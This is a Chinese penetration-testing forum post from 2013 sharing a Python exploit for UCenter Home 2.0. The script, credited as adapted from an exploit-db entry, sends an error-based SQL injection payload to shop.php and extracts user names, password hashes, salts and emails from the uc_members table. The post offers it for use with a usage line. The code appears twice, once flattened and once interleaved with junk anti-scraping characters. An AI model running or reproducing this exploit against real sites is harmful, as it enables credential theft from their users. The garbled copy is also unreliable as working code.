找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 UCenter Home 2.0 EXP
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1950|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 09:18:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
% m9 {) s4 b, b2 k! A 1 z, d8 ~7 v+ z1 u1 u# ~

" @$ d$ W3 X9 `) ^: R/ g#!/usr/bin/env python  9 O% W& `; R* u" }5 C$ ^
1 ]0 j2 n; e* A( B
import sys  
4 W* ]: q9 L2 M7 f" m$ oimport urllib2  7 |! d5 D4 x: J# U; X3 r4 m
import re  6 X+ t' U% b3 c0 ]8 n

1 M) \; I. i9 J: x1 D; B( xdef info():  4 \: Z; j# Y& O& k9 }$ H! b
    print 'From:http://www.exploit-db.com/exploits/14997/' . I% e+ j- X! p# `$ x8 w7 I
    print 'http://www.hake.cc/Web_loudong/' # M$ U! Q; H9 M$ z  U
    print 'changed:qiaoy'  / S) O, x, E+ L% N
    print 'exp:'  # t9 r. r/ P6 g3 y9 u; v/ e
    print ' ./UCenter_Home_2.0.py site'  
: B4 y( q1 \* D/ g: M' c* J
6 V% ?8 j" ^$ t$ L- W0 R; W1 Ddef main():  5 E$ C( `1 ^# r3 `. f, G
    if len(sys.argv) != 2:  
7 n& y5 c/ I, z8 d" ?        info()  
+ ]0 l6 k: K5 j) N6 _1 I, d+ |5 T2 U    else:  
5 }3 B+ @5 l* u" e' R        site = sys.argv[1]  
2 D9 M3 E' m" i        if site[0:7] == 'http://':  . k! s+ `9 }# j7 p9 u( f: o  Q) a
            sitesite =site  
; z+ g% S6 L! _! T* o: _        elif site[0:8] == 'https://':  / O& x4 p9 f9 _" p7 N0 K& G
            sitesite = site  ) T2 G; h. d, {& s" P* G8 K
        else:  0 K0 X5 L: R6 z; t6 J. `
            site = 'http://'+site  / ~# y) c1 B- t6 C; r) G
        try:  
, F# e( R3 Y( D" I+ T' N            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  
0 @! u& Z' u4 Z9 E- I1 V  Z9 O            Value = urllib2.urlopen(url).read()  
8 O. }* k* C/ z            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  
, w. l/ r' k% H* v- o  D' K            hacked = Msg.split(':')  ) L  m: J; n: U) `! k
            print 'Name:    '+hacked[1]  0 _  j3 t; Q! Q. x) }8 B
            print 'Passwd:  '+hacked[2]  
0 p# z& i2 ]) ~' Y% f. J            print 'salt:    '+hacked[3]  
; q. [4 I& k  T6 ^            print 'email:   '+hacked[4]  
6 a. N! y% p' C        except:  
4 j: @" n$ I7 K& s& P- v            print 'Sorry,I can\'t work............'  
3 d8 V6 ~8 a# B* O3 |4 N3 E : X: X, N6 J7 e
if __name__ == '__main__':  
8 _- `' @) ^- c. I    main()
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表